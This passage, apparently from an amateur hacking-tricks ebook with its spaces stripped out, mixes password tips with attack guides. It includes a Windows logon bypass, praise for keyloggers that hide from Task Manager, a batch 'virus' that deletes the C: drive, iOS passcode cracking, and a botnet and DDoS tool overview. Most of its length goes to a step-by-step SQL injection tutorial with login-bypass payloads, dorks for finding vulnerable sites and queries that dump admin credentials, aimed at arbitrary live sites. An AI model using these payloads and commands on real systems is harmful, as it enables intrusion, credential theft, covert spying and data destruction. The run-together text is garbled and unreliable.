Usedifferentpasswordsforeachsystem.Thisisespeciallyimportantfornetworkinfrastructurehosts,suchasservers,firewalls,androuters.It’sokaytousesimilarpasswords—justmakethemslightlydifferentforeachtypeofsystem,suchaswweraw777-Win7forWindowssystemsandwweraw453forLinuxsystems.

Usevariable-lengthpasswords.Thistrickcanthrowoffattackersbecausetheywon’tknowtherequiredminimumormaximumlengthofPasswordsandmusttryallpasswordlengthcombinations.

Don’tusecommonslangwordsorwordsthatareinadictionary.

Don’trelycompletelyonsimilar-lookingcharacters,suchas3insteadofE,5insteadofS,or!Insteadof1.Password-crackingprogramscanforthis.

Usepassword-protectedscreensavers.Unlockedscreensareagreatwayforsystemstobecompromisedeveniftheirharddrivesareencrypted.

Don’t reusethesamepasswordwithinatleastfourtofivepasswordchanges.Don’tsharepasswords.Toeachhisorherown!

Avoidstoringuserpasswordsinanunsecuredcentrallocation,suchasanunprotectedspreadsheetonaharddrive.Thisisaninvitationfordisaster.UsePasswordSafeorasimilarprogramtostoreuserpasswords.

KONBOOT

BYPASSWINDOWSLOGONSCREENPASSWORD

SometimesitcreatesacriticalconditionifyouforgotyourWindowsadministratorpasswordandit’squiteurgenttorecoveritwithoutanyflaw.Thisarticlewillmakeitconvenienttorecoveryouradminpassword.

WeareusingatoolnamedasKON-BOOT.

Kon-BootisanapplicationwhichwillbypasstheauthenticationprocessofWindowsbasedoperatingsystems.Itenablesyouloginintoanypasswordprotectedtestmachinewithoutanyknowledgeofthepassword.

Kon-Bootworkswithboth64-bitand32-bitMicrosoftWindowsoperatingsystems.

Needythings:–APenDriveorAnyUSBDevicesuchasMemoryCardorablankCD.Kon-Boot(Latestversion)Your5minutesandalsoaworkingmind.

Technicalinstructions:–1.DownloadKON-BOOTfrominternet.2.ExtracttheZIPandrunthe“KonBootInstaller.exe”3.BurntheISO.4.BootfromCD/USBdevice.5.AfterWindowsisloadeditwillshowyouaKon-bootscreen.

6.LeavethepasswordboxemptyandjusthitOKitwilldirectlyenableyouintothewindowsaccount.Limitations:ITMAYCAUSEBSOD(NOTEPADPARTICULARBUGS).

KEYLOGGERS

BEAWAREKEYSTROKELOGGING

Oneofthebesttechniquesforcapturingpasswordsisremotekeystrokelogging—theuseofsoftwareorhardwaretorecordkeystrokesasthey’retypedintothecomputer.

Generallyyouusetoaskyourfriendsorrelativesforlogginginintoyouraccountbytheircomputers.

So,becarefulwithkeyloggersinstalledintheircomputers.Evenwithgoodintentions,monitoringemployeesraisesvariouslegalissuesifit’snotdonecorrectly.Discusswithyourlegalcounselwhatyou’llbedoing,askfortheirguidance,andgetapprovalfromuppermanagement.

Loggingtools:-Withkeystroke-loggingtools,youcanassessthelogfilesofyourapplicationtoseewhatpasswordspeopleareusing:Keystroke-loggingapplicationscanbeinstalledonthemonitoredcomputer.Isuggestyoutocheckoutfamilykeyloggerby(www.spyarsenel.com).AnotherpopulartoolisInvisibleKeyLoggerStealth;DozensofothersuchtoolsareavailableontheInternet.

OnemoreyoucancheckoutisKGBemployeemonitorisoneofthefavoriteofme…..Becauseitisnotonlyinvisiblebutitwillalsonotshownbyyourtaskmanageranditusespasswordprotectiontoo.

Hardware-basedtools,suchasKeyGhost(www.keyghost.com),fitbetweenthekeyboardandthecomputerorreplacethekeyboardaltogether.Akeystroke-loggingtoolinstalledonasharedcomputercancapturethepasswordsofeveryuserwhologsin.

PREVENTIONS:

Thebestdefenseagainsttheinstallationofkeystroke-loggingsoftwareonyoursystemsistouseananti-malwareprogramthatmonitorsthelocalhost.It’snotfoolproofbutcanhelp.Asforphysicalkeyloggers,you’llneedtovisuallyinspecteachsystem.

Thepotentialforhackerstoinstallkeystroke-loggingsoftwareisanotherreasontoensurethatyourusersaren’tdownloadingandinstallingrandomsharewareoropeningattachmentsinunsolicitedemails.ConsiderlockingdownyourdesktopsbysettingtheappropriateuserrightsthroughlocalorgroupsecuritypolicyinWindows.

DOYOUHAVERATED7.9?

LearnHowtoHackWindowsExperienceIndex

StartingfromWindowsVista,MicrosoftintroducedakindofbenchmarkingsysteminitsOperatingSystem.InWindowsVistaand7userscanratetheirPCusingtheWindowsExperienceIndex.TheHighestpossiblescoreinWindowsVistais5whileWindows7machinescangoupto7.9intheexperienceindex.

IntheWindowsExperienceindexthebasescoreisbasedonthelowestscoreofanycomponent.SuchasinthetestPCitwas4.4basedbecauseoftheGraphicssubscore.

Howeveritisnotsotoughtomanipulatethesenumbersandchangethesescoresaccordingtoyourwill.Youcanchangethesejusttofoolanyone.

GETTINGSTARTED

TomakethingssimplifiedwewouldrecommendyoutorunWindowsExperienceIndexfirst(Ifyouhavenotdoneso)ifyouhavedonethatyoucanskipthissection.

TodothoseopenControlpanelsgotoSystemandsecurityandthenclickonChecktheWindowsExperienceIndex

AfterthatclickonRateThiscomputerNotethatyourComputermaytakeseveralminutesinratingthesystem

Youwillseeascreensimilartothis.

MESSINGUPWITHSCORESTomanipulatethesescoresheadtoWindowsinstallationdrive(C:inourcase).Thengoto

Windows>Performance>WinSAT>DataStoreYouwillabletoseeseveralindexingfilesthere.

Youwillneedtoopenthefileendingwith“Formal.Assessment(Initial).WinSAT”

Openthefileinnotepad.Youwillseethefollowingwindow:

Inthenotepadwindowyoudon’tneedtodotoodowntohuntanything,simplychangethevaluesaccordingtoyourwillintheupperarea.Thevaluesarewrittenbetweentags.Suchas

<MemoryScore>5.9</MemoryScore>

Changethevaluesbetweentagsandsavethefiles.NexttimeyouwillopentheWindows<ExperienceIndexthevalueswillbechanged.

OFFTHEROADTIP:FormorefunwesuggesteveryonetokeeptheirScoresrealistic(Not7.9Exactly)

Torevertthechangesyoucanre-runtheassessment.

THEHIDDENDRIVES

HACKTOHIDELOCALDRIVES

Inthisarticlewearegoingtolearnabouthidingthestuffs.Generally,youguysusetohidetheparticularfilewhichyouwanttokeeppersonal.Whichisthemostcommonwayinthesedaysanditcaneasilybeexposedevenbyamiddleschoolchild.

But,herewearegoingtolearnthathowtohidethewholespecifieddrives(localdisks)whichkeepyousafefromyourfamilychild.Youcaneasilykeepyourdatasafeeitheritisyourgirlfriend’spicorblah…blah…blah…!

Let’sstarttolearnhowtohidethespecifieddrivesstepbystep:-

Forhidingthedrivesyouhavetoeditthegrouppoliciesofyourcomputer.Foreditinggrouppoliciesjustgoonthe“run”optionandtype “gpedit.msc”andclickonok.OrYoucaneasilysearchinyoursearchboxfortheGROUPPOLICY.

Thegrouppolicyeditorwillbeopenedafteryou!

Thenyouwillseeintheleftpartofthewindowthereisa“USER

CONFIGURATION”option.Undertheuserconfigurationoptiontherearethreeoptions:1.)Softwaresettings2.)Windowssettings3.)Administrativetemplates

Justgiveasingleclickontheadministrativetemplateoption.Youseethatsomeoptionsaremadeavailableintherightpartofthewindow.Openthe“allsettingsoption.”

Whenyouopenedthe“allsettingsoptions”thereisalistoflotofoptionsdisplayedafteryou!Clickonthe“settings”optiontoarrangethemthenalphabetically.Ifalreadyarranged

youcanskipthisstep.

Nowclickingsometimesthe“H”keyofyourkeyboardsearchforthe“hidethesespecifieddrivesinmycomputer”option.

Doubleclickonthe“hidethesespecifieddrivesinmycomputer” option.Awindowwillopensafteryou.

“ENABLE”itand chooseforthedriveswhichyouwanttohidefromthegivenoptionsinthelowerleftpartofthewindow.Afterapplyingthesettingsjustclickonokandyouseethedriveswillhideaccordingtoyourchoice.IhaveselectedtohideonlyA,B,CandDdrivesonlysotheE:drivewillnotbehiddeninthescreenshotgivenbelow.

Intheabovegivenscreenshotonly“E:”driveisshowntotheuser.Ifyouwanttoaccessthedriveswhicharehiddenthenyouhavetoclickontheaddressbarofmycomputer’swindowasmarkedintheabovescreenshotandtypeD:”or“C:”andclickonENTERbuttonofyourkeyboardtoopenthedrivesrespectively.

EMPTYHDD

FORMATHARDDISKWITHNOTEPAD

InthisarticlewearegoingtolearnhowtodeletecompletelyyourC:driveofyourcomputerwithoutaformattingcompactdisk.JustdoitonyourownriskbecauseitwilldestroythewindowsofyousystemandforthisIamnotresponsible.

FOLLOWTHEBELOWSTEPSTOFORMATYOUC:DRIVE:_Openthenotepadandtypethefollowinggivecode

CODE:@echooffdelC:\*.*\y

Saveitwiththeextension“.bat”Suchas“virus.bat”.

Doubleclickonthesavedfiletorunthisvirus.Commandpromptwillbeopenedafteryouwhereitwillbedeletingyourdrive.Note:“Ihavenottriedthisvirusyet,andalsopleasedon’ttryonyourpersonalcomputers.Ifyouhavetriedeverpleasegivemethereviews.”

LET’SHAVESOMEFUN

FUNNYVIRUSTOSHOCKYOURFRIENDS

Helloguys,Ithinkafterreadingtheabovechaptersnowit’stimetohavesomefun.Inthisarticlewearegoingtolearnthathowtogiveashocktoyourfriendforaminute.

Basicallyherewearegoingtocreateafunnyviruswhichwillnotactuallyharmyourfriend’scomputerbutitwillshockhim/herforaminute.

Solet’screatethatvirusfollowingthesamestepsaswehavecreatedsomevirusesinpreviouschapters.Sofollowthesteps:Openthenotepadandtypethefollowingcode:

CODES:@echooffmsg*yourcomputerisattackedbyavirus.msg*clickoktoformat.msg*allyourdatahasbeendeleted.

Savethedocumentwiththeextension“.bat”Forexampleyoucansavethevirusbythename“funnyvirus.bat”

Nowyourworkistoexecutethevirus.Justdoubleclickonthevirusanditwillshowyouamessagethat

“yourcomputerisattackedbyavirus”.

Noweitheryouclickon“ok”oryouclosetheabovemessagebox,itwillagainshowyouamessage“clickoktoformat”.AndIamsurethatyouwillnotgoingtoclickonok.Butagainitdoesnotmatterifyouclickonokorclosethebox,butIamsurethatyouwillclosethebox.Againitwillshowyouamessagethat“allyourdatahasbeendeleted”.Andforamomentyourfriend’sheartbeataregoingtobeontheoptimum.

Sothisisafunnywaytoshockyourfriendswithoutharmingthemactually.

DOYOUHAVEi7

?HOWTOCHANGEYOURPROCESSORNAME

ThetrickwearegoingtolearnhereisthemostinterestingtrickandIamsurethatitwillincreaseyourprestigeamongyourfriends.Becausenowthesedaysit’sabigdealamongthegroupofyourfriendthatifyouhavei3,i5ori7processor.Solet’slearnhowtochangeyourpcfromanyofcoreprocessortoi7.

Forityouhavetofollowthesesteps:

Firstofallyouhavetogoonthe“run”optionandwrite“regedit”toopentheregistryeditorofyourcomputerandclickonokItwillopentheregistryeditingwindowafteryou.

Openthe“HKEY_LOCAL_MACHINE”ashighlightedinthefigure.

Thenopenthe“hardware”optionpresentunderit.

Thenopenthe“Description”optionandthenopenthe“system”option.Alsoopenthe“centralprocessor”optionundersystemoption.

Thengiveasingleclickto“0”folderpresentunder“centralprocessor”.Andthenyouwillseethatintherightpartoftheregeditwindowthereappearalotofoptions.ThisiscalledasSTRINGS.Searchforthe“processornamestring”amongthosestrings.

Opentheprocessornamestringgivingadoubleclickonit.Adialogueboxwillopen

afteryou.Inthe“valuedata”textboxitiswrittenwhatyourcomputer’sprocessoractuallyis.

Iamusing“Pentium(R)Dual-CoreCPUT4500@2.30GHz”aswritteninthevaluedata.Nowdeletethosetextsandwriteyourowntextreplacingthem.Suchasyoucanwrite”Intel(R)Corei7CPU T9500@2.30GHz”andclickon“ok”option.

Nowclosetheregistryeditorandlet’scheckifitisworkingornot.Forcheckingit,youhavetocheckthepropertiesofyourcomputer.Forcheckingit,justgivearightclickonmycomputericonandclickonthe“properties”optionwhichisthelastoptionofthedialoguebox.

Thesystempropertiesofyourcomputerareshownafteryou.

Yuppie!Asyouhaveseenintheprocessornameitwillbeasexpected.Nowyourprocessoristurnedintoi7.

Andnow youcansaywithproudthatYOUHAVEACOREi7PROCESSOR.

GOOGLE

HOWTOMAKEYOURGOOGLESEARCHSEFFECTIVE

InthisarticlewearegoingtolearnhowtomakeourGooglesearcheseffective.IfwehavetofindanythingonGoogleweusetoopentheGooglewebsiteandstartsearchinglikeifyouwanttodownloadanybookonGoogleyouusetowritelikethis“fiftyshadesofgreyforfree”.AndyouwillfindahugeamountofresultsonGooglelike753286543567resultsin0.43secondsandwillmakeyoudifficulttofindtheexactworkingdownloadlinkofthatbook.

YoucantakesomeverysimplestepstoreduceyourGooglesearchesresults.Let’sassumewehavetodownloadthesamebookasabovementioned.IfyouusetowriteinthefollowingwayitwillreduceyourGooglesearchesandmakeitsimpletofindtheexactdownloadlink.WriteinthiswayintheGooglesearches:Youhavetowriteyoursearchesunderdoublequotes.Like:-“fiftyshadesofgrey.pdf”Note:-don’tforgettoapplytheextension“.pdf”

Secondmethod:-using“GOOGLEHACKS”Youcanalsouseanapplicationnameas“Googlehacks”.ItiseasilyavailableonthenetandyoucandownloaditeasilybyGooglesearches.

Thisapplicationalsohelpsyoualotinperformingeffectivesearches.

iOSPASSWORDCRACKING

IOSPASSWORDCRACKING

Nowthesedays’peoplegenerallyuse4-digitpintosecuretheirphone.Amobiledevicegetslostorstolenandallthepersonrecoveringithastodoistrysomebasicnumbercombinationssuchas1234,1212,or0000.andsoonthewillbeunlocked.

Let’sseehowtocrackyouriospassword:1.ForthefirststepyouhavetoplugyouiPhoneorcomputerintodevicefirmwareupgrademodei.e.DFUmode:

ToenterDFUmode,simplypowerthedeviceoff,holddowntheHomebutton(bottomcenter)andsleepbutton(uppercorner)atthesametimefor10seconds,andcontinueholdingdowntheHomebuttonforanother10seconds.Themobiledevicescreengoesblank.

2.afterputtingyourphoneintoDFUmodeyouneedtoLoadtheiOSForensicToolkitforthisyouneedtoinsertyourUSBlicensedongleintoyourcomputerandrunningTookit.cmd:

3.AfterthattheworkistodoistoloadtheiOSForensicToolkitRamdiskontothemobiledevicebyselectingoption2LOADRAMDISK:WhenyouloadedtheRAMDISKcodeitallowsyourcomputertocommunicatewiththemobiledeviceandrunthetoolswhichareneededforcrackingthepassword(amongotherthings).

4.NowyouneedtoselecttheiOSdevicetype/modelthatisconnectedtoyourcomputer,asshowninFigure:

Idon’thaveiphone6withmenowso;Ihaveselectedoption14becauseIhaveaniPhone4withGSM.

Afterthatyouseethetoolkitwhichisconnectingtothedeviceanditconfirmsasuccessfulload,asshowninFigure:

AlsoyouwillseetheElcomsoftlogointhemiddleofyourmobiledevice’sscreen……Ithinkitlookspretty:

6.Nowifyouwanttocrackthedevice’spassword/PIN,youhavetosimplyselecttheoption6GETPASSCODEonthemainmenu:

iOSForensicToolkitwillpromptyoutosavethepasscodetoafile.Forsavingthepasscodesimply;youcanpressEntertoacceptthedefaultofpasscode.txt.Thecrackingprocesswillcommenceand,withanyluck,thepasscodewillbefoundanddisplayedafteryouasshowninFigure:

So,havingnopasswordforphonesandtabletsisbad,anda4-digitPINsuchasthisisalsonotmuchbetterchoice.Sobeawareabouttheattacks!Getup-users-getupit’stimetobesecured.YoucanalsouseiOSForensicToolkittocopyfilesandevencrackthekeychainstouncoverthepasswordthatprotectsthedevice’sbackupsiniTunes(option5GETKEYS).

PREVENTION:Forthepreventionfrombeinghackedyoucanrefertothechapter“PASSWORDCREATINGPOLICIES”.

HIDEYOURRECYCLEBIN

HACKTOHIDETHERECYCLEBIN

SometimeswhenyoujusttrytomodifythewindowsGUIorevenyouusetoinstallanythemeforyourwindowssometimesyoufindthattherecyclebiniconremainsnotmodifiedanddestroysthebeautyofyourmodification.

SointhisarticlewearegoingtolearnthathowtodeletetheRECYCLEBINbyhackingregistry.

Fordeletingtherecyclebinyouneedtoopentheregistryeditorofyourcomputer.Ithinknowafterreadingtheabovesectionsyouarefamiliarwiththe“registryeditor”.Sogothroughtheregistryeditorandfollowthegivenpath.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVe00AA002F954E}

Whenyoufinallyopenedthelastpath,youwillseethedefaultstringofrecyclebinisdefined.NowDELETEthatstringandrestartyourcomputer.Youwillfindthatrecyclebinisdeleted.Iamattachingascreenshotforyourease.

Byfinalizingallstepsdon’tforgettorestartyourcomputer.Itwillworkonlyontherestart.

HOWBOTNETDDoSATTACKWORKS…

DDoSAttack?

DDoSstandsfor“DistributedDenialofService.”ADDoSattackisalsoamaliciousconceivetoproduceaserveroranetworkresourceinaccessibletousers,normallybyquicklyofficiouswithorsuspendingtheadministrationsofahostrelatedtothenet.IncontrasttoaDenialofService(DoS)attack,insidethatonecomputerandoneinternetassociationisusedtofloodtargetedresourcewithpackets,aDDoSattackusesmanycomputersandlotsofinternetconnections.DDoSattacksislooselydividedintothreedifferenttypes.Thefirst,ApplicationLayerDDoSAttacksembraceSlowloris,Zero-dayDDoSattacks,DDoSattacksthatconsiderApache,WindowsorOpenBSDvulnerabilitiesandextra.ComprisedofSeeminglylegitimateandinnocentrequests,thegoaloftheseattacksistocrashthenetserver,andadditionallythemagnitudeismeasuredinRequestspersecond.ThesecondkindofDDoSattack,ProtocolDDoSAttacks,alongwithSYNfloods,fragmentedpacketattacks,PingofDeath,SmurfDDoSandextra.Thissortofattackconsumesactualserverresources,orthoseofintermediatefacility,likefirewallsandloadbalancers,andismeasuredinPacketspersecond.ThethirdkindofDDoSattackisusuallythought-abouttomostdangerous.Volume-basedDDoSAttacksembraceUDPfloods,ICMPfloods,anddifferentspoofedpacketfloods.Thevolume-basedattack’sgoalistosaturatetheinformationmeasureoftheattackedwebsite,andmagnitudeismeasuredinBitspersecond.

Botnet?

Sometimesobservedasa“BunchofZombies,”aBotnetmaybeaclusterofInternet-connectedcomputers,everyofthathasbeenmaliciouslycondemned,sometimeswiththehelpofmalwarelikeTrojanHorses.Usuallywhilenotthedataofthecomputers’rightfulhomeowners,thesemachinessquaremeasureremotelycontrolledbyanexternalsourceviacommonplacenetworkprotocols,andoftenusedformaliciousfunctions,mostordinarilyforDDoSattacks.

BotnetTools

TheconceiverofaBotnetisoftenbroughtupasa“botherder”or“botmaster.”ThisindividualcontrolstheBotnetremotely,usuallythroughassociateIRCserverorachannelonapublicIRCserver–referredtoasthecommandandcontrol(C&C)server.TocommunicatewiththeC&Cserver,thebotmasterusesnumeroushiddenchannels,aswellasapparentlyinnocuoustoolslikeTwitterorIM.Alotofadvancedbotsautomaticallyhuntdownalotofresourcestoexploit,joiningalotofsystemstotheBotnetduringaprocessreferredtoas“scrumping.”BotnetserversmightcontinuallycommunicateandworkwithdifferentBotnetservers,makingentirecommunitiesofBotnet’s,withindividualormultiplebotmasters.ThisimpliesthatanygivenBotnetDDoSattackmayverywellhavemultipleorigins,orbecontrolledbymultiplepeople,generallyoperatingincoordination,generallyoperatingsingly.Botnetsareaunitobtainableforrentorleasefromnumeroussources,anduseofBotnet’sareauctionedandlistedamongattackers.Actualmarketplaceshavesprungup–platformsthatmodifycommercialisminlargenumbersofmalware-infectedPCs,whichmightberentedandemployedinBotnetDDoSordifferentattacks.TheseplatformsofferBotnetDDoSattackperpetratorswithanentireandrichly-featuredtoolkit,andadistributionnetworkadditionally.Evenfornon-technicalusers,BotnetDDoSattackingmaybeaviableandefficientchoiceto“takeout”acompetitor’swebsite.Atintervalsthecrimesystem,BotnetDDoSattacksareaunitathoughtartifact,withcoststakingplace,andeffectivenessandclassgrowing.Anumberoftheforemost

commontoolsforinitiatingaBotnetDDoSattackaresimplydownloadedfrommultipleon-linesources,andinclude:

SlowLoris

EspeciallydangeroustohostsrunningApache,dhttpd,tomcatandGoAheadWebServer,Slowlorismaybeahighlytargetedattack,enablingoneinternetservertorequiredownanotherserver,whilenottouchingdifferentservicesorportsonthetargetnetwork.

Tor’sHammer

IsaslowpostdostestingtoolwritteninPython.ItalsocanberunthroughtheTornetworktobeanonymized.ThereareseveraltoolsfortestingserverreadinesstoresistBotnetDDoSattacks.

QslowlorisUsesQtlibrariestoexecutethewaysutilizedbySlowloris,providingagraphicalinterfacethatcreatestheprogramhighlysimpletouse.ApacheKiller

UtilizesanexploitwithintheApacheOSinitialdiscoveredbyaGooglesecurityengineer.ApacheKillerpingsaserver,tellstheservertointerruptupwhateverfileistransferredintoahugerangeoflittlechunks,usingthe“range”variable.Whentheservertriestoadjusttothisrequest,itrunsoutofmemory,orencountersalternativeerrors,andcrashes.

PyLorisItisascriptabletoolfortestingaservice’slevelofvulnerabilitytoaspecificcategoryofDenialofService(DoS)attackDDoSim

WhichcanbeemployedinalaboratoryatmospheretosimulateaDDoSattack,andhelpslivethecapabilityofagivenservertohandleapplication-specificDDOSattacks,bysimulatingmultiplezombiehostswithrandomIPaddressesthatcreatetransmissioncontrolprotocolconnections.

BotnetDDoSAttacks

BotnetDDoSattacksarequicklyturningintotheforemostprevailingvarietyofDDoSthreat,growingspeedilywithinthepastyearineachnumberandvolume,consistentwithrecentmarketingresearch.Thetrendistowardsshorterattackperiod,howeverlargerpacket-persecondattackvolume,andthereforetheoverallvarietyofattacksaccordinghasgrownupmarkedly,aswell.Thetypicalattackinformationmeasureascertainedthroughoutthiseraof2010-2012wasfive.2Gbps,whichis148%abovethepreviousquarter.AnothersurveyofDDoSattacksfoundthatquite400thofrespondent’soldattacksthatexceeded1Gbitspersecondinbandwidthin2011,and13weretargetedbyaminimumofoneattackthatexceeded10Grate.Fromamotivationalperspective,neweranalysisfoundthatideologicallydrivenDDoSattacksareontheincrease,supplantingmonetarymotivationbecausethemostfrequentincentivesuchattacks.

WEBSITEHACKING

WEBSITEHACKING

Nowtakeyourtimeandbeseriousandfreebeforestartingthisarticlebecausethisistheverywideandoneofthemostinterestingarticlesamongalloftheabovechapters.WewilldiscussinthischapterthathowtohackanyvulnerablesiteusingSQLinjection.

WhatisSQLInjection?

SQLinjectionisoneofthepopularwebapplicationshackingmethod.UsingtheSQLInjectionattack,anunauthorizedpersoncanaccessthedatabaseofthewebsite.AttackercanextractthedatafromtheDatabase.

WhatahackercandowithSQLInjectionattack?

*ByPassingLogins*Accessingsecretdata*Modifyingcontentsofwebsite*ShuttingdowntheMySQLserver

So,herewestartwithbypassinglogin…….i.e.Authenticationbypass:

InthistypeofSQLinjectiongenerallyifwehadfoundtheAdminloginpageandafterthatwewilltrytoopenthecontrolpanelaccountoftheadminbypassingtheauthentication.Ifyouhavetheadminloginpageofanywebsitethenyoucanpastethefollowingcodes(withquotes)tobypasstheauthenticationofthewebsite….generallyPHPwebsitesarevulnerabletothisinjection:

YoucanfindthesetypesofsitessimplybyGooglesearches.YouhavetotypelikethisintheGooglesearchbar:

www.thesitename.com/adminlogin.php?Or/admin.php?OrWp-login.php?Etc.

AfterfindingtheloginpageyouhavetopastethefollowingcodesinbothuserIDandpasswordoftheadminpagetillitwillbypassed.IfnotwewilltrythenextSQLinjectioni.e.unionbased,blindbased,errorbasedetc.

CodestobeusedasbothuserIDandpasswordattheadminloginpageofvulnerablewebsiteforbypassingauthenticationareasfollow:

‘or’1’=’1‘or‘x’=‘x‘or0=0–”or0=0–or0=0–‘or0=0#”or0=0#or0=0#‘or‘x’=‘x”or“x”=”x‘)or(‘x’=‘x‘or1=1–”or1=1–or1=1–‘ora=a–”or“a”=”a‘)or(‘a’=‘a“)or(“a”=”ahi”or“a”=”ahi”or1=1–hi’or1=1–‘or’1=1’

Iftheauthenticationbypasswillnotworkthentrythefollowingtechniquescarefullyandstepbystep:UNIONBASEDSQLi:FindingVulnerableWebsite:

TofindaSQLInjectionvulnerablesite,youcanuseGooglesearchbysearchingforcertainkeywords.Thatkeywordoftencalledas“GOOGLEDORK”.

SomeExamples:inurl:index.php?id=inurl:gallery.php?id=inurl:article.php?id=inurl:pageid=

NowyouhavetoCopyoneoftheabovekeywordandGoogleit.Here,wewillgetalotofsearchresultswithwhichwehavetovisitthewebsitesonebyoneforfindingthevulnerability.

Forexample:site:www.anyselectedsite.cominurl:index.php?id=Step1:FindingingtheVulnerability:

Nowletusthevulnerabilityofthetargetwebsite.Tothevulnerability,addthesinglequotes(‘)attheendoftheURLandpressenter.

Foreg:

http://www.anyselectedsite.com/index.php?id=2‘Ifthepageremainsinsamepageorshowingthatpagenotfound,thenitisnotvulnerable.Ifyougotanerrormessagejustlikethis,thenitmeansthatthesiteisvulnerable.

YouhaveanerrorinyourSQLsyntax;themanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear‘'’atline1

Step2:FindingNumberofcolumnsinthedatabase:Great,wehavefoundthatthewebsiteisvulnerabletoSQLiattack.OurnextstepistofindthenumberofcolumnspresentinthetargetDatabase.Forthatreplacethesinglequotes(‘)with“orderbyn”statement.Changethenfrom1,2,3,4,,5,6,…n.Untilyougettheerrorlike“unknowncolumn“.

Foreg:http://www.anyselectedsite.com/index.php?id=2orderby1http://www.anyselectedsite.com/index.php?id=2orderby2http://www.anyselectedsite.com/index.php?id=2orderby3http://www.anyselectedsite.com/index.php?id=2orderby4Ifyougettheerrorwhiletryingthe“n”thnumber,thennumberof

columnis“n-1”.Imean:http://www.anyselectedsite.com/index.php?id=2orderby1(noerrorshownshown)http://www.anyselectedsite.com/index.php?id=2orderby2(no

errorshown)http://www.anyselectedsite.com/index.php?id=2orderby3(noerrorshown)http://www.anyselectedsite.com/index.php?id=2orderby4(noerrorshown)http://www.anyselectedsite.com/index.php?id=2orderby5(noerrorshown)http://www.anyselectedsite.com/index.php?id=2orderby6(no

errorshown)http://www.anyselectedsite.com/index.php?id=2orderby7(noerrorshown)http://www.anyselectedsite.com/index.php?id=2orderby8(errorshown)

Sonown=8,thenumberofcolumnisn-1i.e.,7.

Incase,iftheabovemethodfailstoworkforyou,thentrytoaddthe“—”attheendofthestatement.Foreg:

http://www.anyselectedsite.com/index.php?id=2orderby1-Step3:FindtheVulnerablecolumns:

Wehavesuccessfullyfoundthenumberofcolumnspresentinthetargetdatabase.Letusfindthevulnerablecolumnbytryingthequery“unionselectcolumnssequence”.

Changetheidvaluetonegative(imeanid=-2).Replacethecolumns_sequencewiththenofrom1ton-1(numberofcolumns)separatedwithcommas(,).

Foreg:

Ifthenumberofcolumnsis7,thenthequeryisasfollow:http://www.anyselectedsite.com/index.php?id=-2unionselect1,2,3,4,5,6,7—

Ifyouhaveappliedtheabovemethodandisnotworkingthentrythis:http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,3,4,5,6,7-

Onceyouexecutethequery,itwilldisplaythevulnerablecolumn.

Bingo,column‘3’and‘7’arefoundtobevulnerable.Letustakethefirstvulnerablecolumn‘3’.Wecaninjectourqueryinthiscolumn.Step4:Findingversion,database,userReplacethe3fromthequerywith“version()”Foreg:http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,version(),4,5,6,7—Now,Itwilldisplaytheversionas5.0.2or4.3.Somethinglikesthis.Replacetheversion()withdatabase()anduser()forfindingthedatabase,userrespectively.Foreg:http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,database(),4,5,6,7-http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,user(),4,5,6,7-Iftheaboveisnotworking,thentrythis:http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect

1,2,unhex(hex(@@version)),4,5,6,7-

Step5:FindingtheTableNameIftheDatabaseversionis5orabove.Iftheversionis4.x,thenyouhavetoguessthetablenames(blindsqlinjectionattack).Letusfindthetablenameofthedatabase.Replacethe3with“group_concat(table_name)andaddthe“frominformation_schema.tableswheretable_schema=database()”

Foreg:

http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,group_concat(table_name),4,5,6,7frominformation_schema.tableswheretable_schema=database()-

Nowitwilldisplaythelistoftablenames.Findthetablenamewhichisrelatedwiththeadminoruser.

Letuschoosethe“admin”table.Step6:FindingtheColumnNameNowreplacethe“group_concat(table_name)withthe“group_concat(column_name)”

Replacethe“frominformation_schema.tableswheretable_schema=database()—”with“FROMinformation_schema.columnsWHEREtable_name=mysqlchar—

WehavetoconvertthetablenametoMySqlCHAR()string.InstalltheHackBaraddonfrom:https://addons.mozilla.org/en-US/firefox/addon/3899/

Onceyouinstalledtheadd-on,youcanseeatoolbarthatwilllooklikethefollowingone.IfyouarenotabletoseetheHackbar,thenpressF9.

Selectsql->Mysql->MysqlChar()intheHackbar.

ItwillaskyoutoenterstringthatyouwanttoconverttoMySQLCHAR().WewanttoconvertthetablenametoMySQLChar.Inourcasethetablenameis‘admin’.

NowyoucanseetheCHAR(numbersseparated

withcommans)intheHacktoolbar.

Copyandpastethecodeattheendoftheurlinsteadofthe“mysqlchar”

Foreg:http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,group_concat(column_name),4,5,6,7frominformation_schema.columnswheretable_name=CHAR(97,100,

109,105,110)—Theabovequerywilldisplaythelistofcolumn.Forexample:

admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_usernme,username,password..etc..

Nowreplacethereplacegroup_concat(column_name)withgroup_concat(columnname1,0x3a,anothercolumnname2).

Nowreplacethe”fromtable_name=CHAR(97,100,table_name”information_schema.columnswhere

109,105,110)”withthe“fromForeg:http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7fromadmin-Iftheabovequerydisplaysthe‘columnisnotfound’error,thentryanothercolumnnamefromthelist.

Ifwearelucky,thenitwilldisplaythedatastoredinthedatabasedependingonyourcolumnname.Forexample,usernameandpasswordcolumnwilldisplaythelogincredentialsstoredinthedatabase.

Step7:FindingtheAdminPanel:

Justtrywithurllike:http://www.anyselectedsite.com/admin.phphttp://www.anyselectedsite.com/admin/http://www.anyselectedsite.com/admin.htmlhttp://www.anyselectedsite.com:2082/etc.

Ifyouarelucky,youwillfindtheadminpageusingaboveurlsoryoucanusesomekindofadminfindertoolslikeHavijadminfinder,sqlpoisonforSQLattacking(tool).

Andonceyoufoundtheadminpanelyouhavetodofurtherworksonyourownrisk.PREVENTION:

Thisarticleisfocusedonprovidingclear,simple,actionableguidanceforpreventingSQL

Injectionflawsinyourapplications.SQLInjectionattacksareunfortunatelyverycommon,andthisisduetotwofactors:

